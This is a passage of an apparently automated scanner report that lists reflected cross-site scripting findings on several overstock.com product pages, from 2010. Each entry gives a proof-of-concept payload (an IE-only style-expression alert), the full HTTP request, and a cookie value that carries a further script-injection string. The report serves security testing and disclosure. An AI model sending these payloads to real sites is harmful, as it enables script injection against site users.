GET /Home-Garden/North-Home-400-Thread-Count-Cotton-Sateen-Sheet-Set/4768014/product.html?60142"style%3d"x%3aexpression(alert(1))"1bed08d2ae3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.308. http://www.overstock.com/Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c142"style%3d"x%3aexpression(alert(1))"2d5392bddbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c142"style="x:expression(alert(1))"2d5392bddbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html?4c142"style%3d"x%3aexpression(alert(1))"2d5392bddbe=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.309. http://www.overstock.com/Home-Garden/Nova-3-piece-Counter-Height-Black-Table-Chairs-Set/4063947/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d62a"style%3d"x%3aexpression(alert(1))"5c243bf7d08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1d62a"style="x:expression(alert(1))"5c243bf7d08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Nova-3-piece-Counter-Height-Black-Table-Chairs-Set/4063947/product.html?1d62a"style%3d"x%3aexpression(alert(1))"5c243bf7d08=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.310. http://www.overstock.com/Home-Garden/Original-Hand-painted-Abstract-Oil-Painting/3829316/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6534"style%3d"x%3aexpression(alert(1))"d29659705ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6534"style="x:expression(alert(1))"d29659705ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Original-Hand-painted-Abstract-Oil-Painting/3829316/product.html?b6534"style%3d"x%3aexpression(alert(1))"d29659705ff=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.311. http://www.overstock.com/Home-Garden/Overfilled-Down-on-top-Featherbed/4923794/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818d2"style%3d"x%3aexpression(alert(1))"200e6c65b29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818d2"style="x:expression(alert(1))"200e6c65b29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Overfilled-Down-on-top-Featherbed/4923794/product.html?818d2"style%3d"x%3aexpression(alert(1))"200e6c65b29=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.312. http://www.overstock.com/Home-Garden/Oversize-500-Thread-Count-Lightweight-White-Down-Comforter/3967818/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe6af"style%3d"x%3aexpression(alert(1))"22dc8a0bdcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe6af"style="x:expression(alert(1))"22dc8a0bdcf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Oversize-500-Thread-Count-Lightweight-White-Down-Comforter/3967818/product.html?fe6af"style%3d"x%3aexpression(alert(1))"22dc8a0bdcf=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.313. http://www.overstock.com/Home-Garden/Oversized-500-Thread-Count-All-Season-Warmth-White-Down-Comforter/3507040/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66aca"style%3d"x%3aexpression(alert(1))"39d30f822cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66aca"style="x:expression(alert(1))"39d30f822cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Oversized-500-Thread-Count-All-Season-Warmth-White-Down-Comforter/3507040/product.html?66aca"style%3d"x%3aexpression(alert(1))"39d30f822cb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.314. http://www.overstock.com/Home-Garden/Oversized-Terrycloth-Bath-Robe/508491/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a533b"style%3d"x%3aexpression(alert(1))"8004644d17b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a533b"style="x:expression(alert(1))"8004644d17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Oversized-Terrycloth-Bath-Robe/508491/product.html?a533b"style%3d"x%3aexpression(alert(1))"8004644d17b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.315. http://www.overstock.com/Home-Garden/Oxford-Magic-64-inch-Blinds/3672068/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0f6"style%3d"x%3aexpression(alert(1))"a59806cd629 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc0f6"style="x:expression(alert(1))"a59806cd629 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Oxford-Magic-64-inch-Blinds/3672068/product.html?fc0f6"style%3d"x%3aexpression(alert(1))"a59806cd629=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.316. http://www.overstock.com/Home-Garden/Park-Coffee-4-in-1-Crib/4155148/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2acd3"style%3d"x%3aexpression(alert(1))"83d81f01e38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2acd3"style="x:expression(alert(1))"83d81f01e38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Park-Coffee-4-in-1-Crib/4155148/product.html?2acd3"style%3d"x%3aexpression(alert(1))"83d81f01e38=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.317. http://www.overstock.com/Home-Garden/Pedestal-Bathroom-Vanity-with-Solid-Wood-Stand/3825753/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13309"style%3d"x%3aexpression(alert(1))"c89cc7df604 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13309"style="x:expression(alert(1))"c89cc7df604 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Pedestal-Bathroom-Vanity-with-Solid-Wood-Stand/3825753/product.html?13309"style%3d"x%3aexpression(alert(1))"c89cc7df604=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.318. http://www.overstock.com/Home-Garden/Perry-Ellis-Asian-Lilly-3-piece-Comforter-Set/4998979/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e073"style%3d"x%3aexpression(alert(1))"84169f6931d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e073"style="x:expression(alert(1))"84169f6931d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Perry-Ellis-Asian-Lilly-3-piece-Comforter-Set/4998979/product.html?9e073"style%3d"x%3aexpression(alert(1))"84169f6931d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.319. http://www.overstock.com/Home-Garden/Perry-Ellis-Asian-Lilly-3-piece-Mini-Duvet-Cover-Set/4488348/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa308"style%3d"x%3aexpression(alert(1))"19a65e0a65e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa308"style="x:expression(alert(1))"19a65e0a65e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Perry-Ellis-Asian-Lilly-3-piece-Mini-Duvet-Cover-Set/4488348/product.html?fa308"style%3d"x%3aexpression(alert(1))"19a65e0a65e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.320. http://www.overstock.com/Home-Garden/Perry-Ellis-Asian-Lilly-7-piece-Bed-in-a-Bag-with-Sheet-Set/4998980/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c55d0"style%3d"x%3aexpression(alert(1))"361652bb575 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c55d0"style="x:expression(alert(1))"361652bb575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Perry-Ellis-Asian-Lilly-7-piece-Bed-in-a-Bag-with-Sheet-Set/4998980/product.html?c55d0"style%3d"x%3aexpression(alert(1))"361652bb575=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.321. http://www.overstock.com/Home-Garden/Perry-Ellis-Microfiber-Polyester-4-piece-Sheet-Set/4820137/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8c26"style%3d"x%3aexpression(alert(1))"95e1a9ef18f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8c26"style="x:expression(alert(1))"95e1a9ef18f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
